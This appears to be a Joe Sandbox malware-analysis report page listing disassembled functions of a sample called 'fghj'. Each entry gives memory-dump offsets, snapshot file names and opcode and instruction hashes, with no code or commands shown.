                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a472304c2d24ce98ef5b532bdd320494ae0d870d8887066715c92391c691561a
                                                                                                                                                                                                                    • Instruction ID: 89cf748a9db8a9c355ffbdc22fcbda898a2c54b6c4dce618e5677943e3960aa2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a472304c2d24ce98ef5b532bdd320494ae0d870d8887066715c92391c691561a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A110170240641AFE7218F24DD51BB2B7E2FB12301FE4D4B8D5DAD72AADB30E8518B08
                                                                                                                                                                                                                    Function 00B1B1A6 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4c4df24af8f4fbb044059c3764d9c7da6f09033ab179824af0f6cb8e4e822f04
                                                                                                                                                                                                                    • Instruction ID: a8f3ebc7a65865736c84c9cc16192009d55ccc28a16f51b461f2c117dbff6bc0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4df24af8f4fbb044059c3764d9c7da6f09033ab179824af0f6cb8e4e822f04
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9214BB55043009BE715CF21CC82676BBE2EF97308B64C4ACC18A4B3A7D732E806CB05
                                                                                                                                                                                                                    Function 00B0BA8C Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: a02e6ebdae4fcdda71a17f7e6f49b549f998e6c6e2f3d4120a256d8b334cf655
                                                                                                                                                                                                                    • Instruction ID: b7986b342d8577d34995f550c62c4f13843cbc04145ffe022ad52e0b29bc40e7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a02e6ebdae4fcdda71a17f7e6f49b549f998e6c6e2f3d4120a256d8b334cf655
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95314932E146618FC7198F6488E0BB1BFE1EF03300B1981ACC89697295C768AD15CBC4
                                                                                                                                                                                                                    Function 00B1B2F3 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 472365b532ff525072dd1ae1022c89f4a4f7c7d4f2ee898304fb67736dd5672c
                                                                                                                                                                                                                    • Instruction ID: 5c16bb5204da3e96a3a8d56e0bc2abf64db6ff644f6a130241b467b116139f7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 472365b532ff525072dd1ae1022c89f4a4f7c7d4f2ee898304fb67736dd5672c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F21B0B09003018BE7208F28D851A67B7F1FF56310B499788E4A65F7D1E738E8A1CB99
                                                                                                                                                                                                                    Function 00B18A5A Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e616d77bd3da61b127fdc329f188a9c1457f802ee88feb876315bce3e712fc88
                                                                                                                                                                                                                    • Instruction ID: 3a3090b13b499658bfee81d6997d4c698397b44f0a2db884de726b3fefae1a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e616d77bd3da61b127fdc329f188a9c1457f802ee88feb876315bce3e712fc88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 062100752146419FD769CF24C895BB3B7E2FB96300F59C8ACE086D7256EE32E881CB50
                                                                                                                                                                                                                    Function 00B16C97 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8c7ad75f5222e5dca6cc9cc0964ba730eccd98d0e08584d583e586e03913b28b
                                                                                                                                                                                                                    • Instruction ID: db73958d84b06df8c88b5e4ead2536a7a7e7ba2ad2d067e84e26a7d70f16ed23
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c7ad75f5222e5dca6cc9cc0964ba730eccd98d0e08584d583e586e03913b28b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F42136397082108FC708DF18C8921BABFE5EB86311FA448BCD4C29B355D639DC92AB56
                                                                                                                                                                                                                    Function 00B28718 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: aecd86bd7d6fd731bd9b707a8662fe33e6cee09a7e3f8aef5de16f6945abd593
                                                                                                                                                                                                                    • Instruction ID: 23be09cc6e8411d564aa2d4f9e4ef4e06d149cd18fb8356a4c4ab9dd3a3d92be
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aecd86bd7d6fd731bd9b707a8662fe33e6cee09a7e3f8aef5de16f6945abd593
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21B1356091B08EDB158E3C9490268BBE3AF67320F7C43D8E4B55B3F6CA655D05C751
                                                                                                                                                                                                                    Function 00B28B51 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4c74c9ecc30582568138949de965b1d5bb752f1254393683668c12d8e05b3c12
                                                                                                                                                                                                                    • Instruction ID: 091c072faa6c2e043267792138e6c353f4f9e0c2b9ad2bb060142777d0b9f1ab
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c74c9ecc30582568138949de965b1d5bb752f1254393683668c12d8e05b3c12
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2221C1B0916232CBD724CF68E81056AB7B1FFA6360B15539CD8946F391E7758881CBC8
                                                                                                                                                                                                                    Function 00B19E54 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cba93b24be6c1e5e8276fc5b9dbb34ce7168519879c0d9be808e40dbfcb486c2
                                                                                                                                                                                                                    • Instruction ID: 31de08a6853f8494931f33c3f0b30081a24e9a53ee33c762fea098f10aa84f98
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cba93b24be6c1e5e8276fc5b9dbb34ce7168519879c0d9be808e40dbfcb486c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C511B970504781DFE7114F2988207B2BFF0EF67320F5815C4D4E69B2A2C7249855C765
                                                                                                                                                                                                                    Function 00B0A1D5 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b4ff4992335c3c298c7c889337f7834d19d2f20cebc5d6d511f5b31fbcd6fb19
                                                                                                                                                                                                                    • Instruction ID: ad2eeea53a6e30dbed82b56503d87fadea2b3f6eeddb128332379473ddf172e0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4ff4992335c3c298c7c889337f7834d19d2f20cebc5d6d511f5b31fbcd6fb19
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE2195739526244FD3108DA4C8847517656E7C5328F3E46B9DD249F7D2C97B6C1386C0
                                                                                                                                                                                                                    Function 00B0B5BA Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 1f97b61df27a8662b840fe1322ddf3d4eb7995fccb47ca0f9e58af39a05e2b39
                                                                                                                                                                                                                    • Instruction ID: 499b2f412122724a0863f777e590d489563ecc0a3efaa8f14897350ee78377cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f97b61df27a8662b840fe1322ddf3d4eb7995fccb47ca0f9e58af39a05e2b39
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7521F535A812188BEB19CF25CC85BEDBBB2FB9A300F2884EDD445A3345DB3999058F14
                                                                                                                                                                                                                    Function 00B16BD9 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6a5704204b09268cfd056bcfe6babae032859a7a6013e9e1529113b483bd82b1
                                                                                                                                                                                                                    • Instruction ID: 15f5c20d93ea1dfbd6a13a932924d06797880592892bebf6711e68cd5f1bb0e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a5704204b09268cfd056bcfe6babae032859a7a6013e9e1529113b483bd82b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA113678244340AFE718CF108C56BBA7BE5DB82700FA0546CF5C2AB2D1DA349C428B55
                                                                                                                                                                                                                    Function 003A7619 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: b28e442b463361114dcc3ce20da6e029116f5d70ba11e0e67af2dcf0b822e0c9
                                                                                                                                                                                                                    • Instruction ID: b95f523b8e5e477c9d18e4ef0a2f000e0519edd8a7b0aeabfcfc23897008b554
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b28e442b463361114dcc3ce20da6e029116f5d70ba11e0e67af2dcf0b822e0c9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54213673C152218BC787FFB6DD9A507369BFF83309B868635F8159F459CA30410146C2
                                                                                                                                                                                                                    Function 00B0F7C9 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 27bec56bbdb9060ba6ee15d4e0f485f7ce235535459836e0985285add541655a
                                                                                                                                                                                                                    • Instruction ID: 93de25ee82769009e1c2ffabdf0640ff907a698644b520eb09f1d055114e8648
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27bec56bbdb9060ba6ee15d4e0f485f7ce235535459836e0985285add541655a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE11E539B00352DBD335CB18CC45A76BBA2ABCA704F5A9668D481AB695C731AC01C795
                                                                                                                                                                                                                    Function 00B3CD1D Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 45c6896c94bdb3a21dc2dd563eed43eca3f45e03395d405b3e5259efc4938cf2
                                                                                                                                                                                                                    • Instruction ID: 89cc26ffbe045d1a8a32352eaa44c998258965ecab38839f8d84deee75f630e6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45c6896c94bdb3a21dc2dd563eed43eca3f45e03395d405b3e5259efc4938cf2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A110635B842145FE7118B58CC52B6A3FB3A786310F3881BAE942AB3D9CE359C028758
                                                                                                                                                                                                                    Function 00B00F9A Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                    • Instruction ID: 6f883c662f7c9791b0d71c6a564b49d3e4d5a40e6f8d809269995b43bb42c756
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 373180B4E00209DFCB08CF98C590AAEBBB1FF48314F248599D815AB355D735AA82DF94
                                                                                                                                                                                                                    Function 00B352E5 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                    • Instruction ID: 5467d60f2046f3972e08f97b4443e84a50d2be6f1bca543f44f69ac375795504
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D112933A099D40EC3228D3CC450568BFE30A93674F6D83D9F4B69B2D2C6228D8B8318
                                                                                                                                                                                                                    Function 00B2B475 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 116da147b6d0c13dc0839344de3ce1bce28911c37b08ddf314c5e96e3c81bcea
                                                                                                                                                                                                                    • Instruction ID: 21930fe91fb1cf3f8b78d9e78aed5cd99f790a8c247c4e684fa4ce4615f0bb69
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 116da147b6d0c13dc0839344de3ce1bce28911c37b08ddf314c5e96e3c81bcea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84019EB160031197E620BE61A4C1B27B3E9AF81750F0880ACE92D47383EF65EC05C6A1
                                                                                                                                                                                                                    Function 00B271DC Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d962ba46a225a110db306b294366707fbe8b5f5a41633a14472216bdd48cae3b
                                                                                                                                                                                                                    • Instruction ID: 84183cfcef1469ab9b8c0a8340bac4c7261d9f6e9df1e5425223e6feb2b4c8cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d962ba46a225a110db306b294366707fbe8b5f5a41633a14472216bdd48cae3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001D2A858C360CBCB14CF21A89067A77F1FF97301F1469ADF08697211DB38C906C71A
                                                                                                                                                                                                                    Function 00B17A77 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 495b963e1f7fadb70e3e537b33690fedd9a4d939cd1f3a5a3c54eb91739e4a10
                                                                                                                                                                                                                    • Instruction ID: dcbff39b6ba6cecfcfacd93f63b3038bc4f7759acdd9458944c61c4505406f95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495b963e1f7fadb70e3e537b33690fedd9a4d939cd1f3a5a3c54eb91739e4a10
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501C8717457918BCB29CE25C46027677E2BF93309B1C85ECC0C24B697DE35D502C740
                                                                                                                                                                                                                    Function 00B271DA Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 8037caec1d8280c9ccdc1fe116cba2ed5b64968b5c5b14527aad985de14a2cd3
                                                                                                                                                                                                                    • Instruction ID: cc6830fc044920be71e9105de23af8f0c49cf977257d74a64a958910e161ded7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8037caec1d8280c9ccdc1fe116cba2ed5b64968b5c5b14527aad985de14a2cd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A40128B468D220CFC714CF61A8C16767BF6FB97304F2019BCE04593222CB35C8028B19
                                                                                                                                                                                                                    Function 00B04405 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 668d354aca11d69ecb8f86ab794ec708b7a2a8845dfdf9a201b5d962ea64d59b
                                                                                                                                                                                                                    • Instruction ID: aeff8fc9c848f7943d4e04b32d0bf9f33131f1a4f22c593ea85ddd2c2d8cb62e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 668d354aca11d69ecb8f86ab794ec708b7a2a8845dfdf9a201b5d962ea64d59b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0F6B6B442170BE718DD56ECC0A6BB797EBCA212B1DC178DE4483745CE30F80AD2A5
                                                                                                                                                                                                                    Function 00B27A46 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7f60d3e3765ec578c536800ca2e3744d7626ec02d7785aa85d7274c39cd03ca3
                                                                                                                                                                                                                    • Instruction ID: 764e355720f744140219c7728257f57a3cc6d6f6c9394ef73eb564ad9afae227
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f60d3e3765ec578c536800ca2e3744d7626ec02d7785aa85d7274c39cd03ca3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E01F470C042958BDB06CF29E09057EFFF0EF13314B1850D4D4D26B212DA288A02CB24
                                                                                                                                                                                                                    Function 00B00CFB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                                                                                                                    • Instruction ID: 725e9fc85aae84302c1ae7b3f8fc1300338943a63b32a3fb6c3c6798f00e9057
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
